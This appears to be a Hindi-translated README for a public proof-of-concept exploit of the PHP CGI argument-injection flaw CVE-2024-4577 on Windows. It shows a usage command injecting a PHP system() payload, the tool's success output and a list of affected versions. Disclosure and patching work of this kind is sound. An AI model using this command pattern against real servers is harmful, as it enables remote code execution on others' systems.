
PHP CGI आर्गुमेंट इंजेक्शन (CVE-2024-4577) रिमोट कोड निष्पादन PoC
एक प्रूफ ऑफ कॉन्सेप्ट @watchTowr द्वारा विकसित किया गया है जो PHP CGI आर्गुमेंट इंजेक्शन भेद्यता (CVE-2024-4577) का शोषण करते हुए विंडोज वातावरण में चल रहे एक संवेदनशील PHP संस्करण पर RCE प्राप्त करता है। इस भेद्यता का विस्तृत तकनीकी विश्लेषण
यह भेद्यता DEVCORE (@d3vc0r3) के Orange Tsai (@orange_8361) द्वारा खोजी गई थी। उनके उत्कृष्ट शोध का अनुसरण करना सुनिश्चित करें, हमारी भूमिका केवल इस मुद्दे के लिए शोषण को पुनः बनाना और विकसित करना थी।
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
मूल DEVCORE (@d3vc0r3) द्वारा ब्लॉग पोस्ट के आधार पर, यह भेद्यता विंडोज ऑपरेटिंग सिस्टम पर स्थापित PHP के सभी संस्करणों को प्रभावित करती है:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
चूंकि PHP 8.0, PHP 7, और PHP 5 की शाखाएं एंड-ऑफ-लाइफ (End-of-Life) हैं और अब इनका रखरखाव नहीं किया जाता, सर्वर प्रशासक यहां दिए गए "क्या मैं असुरक्षित हूं" अनुभाग का उल्लेख कर सकते हैं ताकि शमन उपाय अनुभाग में अस्थायी पैच अनुशंसाएं प्राप्त कर सकें।
Aliz (@AlizTheHax0r) और Sina Kheirkhah (@SinSinology), watchTowr (@watchtowrcyber) से
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें